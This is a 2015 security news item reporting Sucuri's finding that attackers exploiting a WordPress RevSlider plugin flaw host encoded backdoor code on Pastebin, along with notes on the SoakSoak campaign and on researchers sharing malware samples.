Hackers Exploiting Pastebin Website in Latest Attacks, Finds Sucuri
According to Sucuri, Pastebin, the website for cutting-and-pasting content and probably most known to be one channel through which attackers exchange stolen data, database dumps as also other malware, is currently favorable for hackers too who've started exploiting it to wage their original assaults, reported digital-era.net dated January 6, 2015.
The hackers rather than utilize hijacked websites for hosting malware, have started utilizing Pastebin for disseminating harmful backdoor program, as also instructing it for running malicious software.
Often, one remote server is used for hosting the backdoor program, however, recently attacks have been noticed abusing vulnerability within RevSlider or Slider Revolution a kind of plug-in associated with WordPress and in which the hackers resort to the Pastebin site for stacking their malevolent programs.
Senior Malware Researcher Denis Sinegubko at Sucuri states that technically, the hackers utilize Pastebin.com for its original function i.e. exchanging codes. But, in the present case, the code being exchanged amongst the crooks is malicious while it's getting utilized for unlawful operation i.e. hacking straight off Pastebin.com. The website lets end-users pull down the malicious program untreated, explains Sinegubko. Softpedia.com reported this, January 8, 2015.
Moreover, all of the utilities within the malicious program aren't obtainable within clear text so the intruders usually employ one encrypting tool suited for Pastebin. After execution of the decrypting operation, the program gets right for utilization.
Sucuri's researchers, during early-September of 2014, got drawn to the technical problem within RevSlider. They estimated that cyber-crooks tried kicking off the security flaw within 1,000-or-more websites.
During the middle of December 2014, Sucuri found SoakSoak a malicious program which would overwrite files within WordPress websites which utilized a previous edition of RevSlider. Although Google had to ban 10,000 websites because they disseminated the program, still the campaign did not come to a halt.
Sucuri points out how these new assaults indicate the need for security researchers to exercise greater caution while exchanging malicious programs that circulate publicly since hackers can again use them straight away, like from the Pastebin site. Indeed, before exchanging, the programs can be blatantly modified to prevent their running whilst downloading them within their crude form.
» SPAMfighter News - 1/16/2015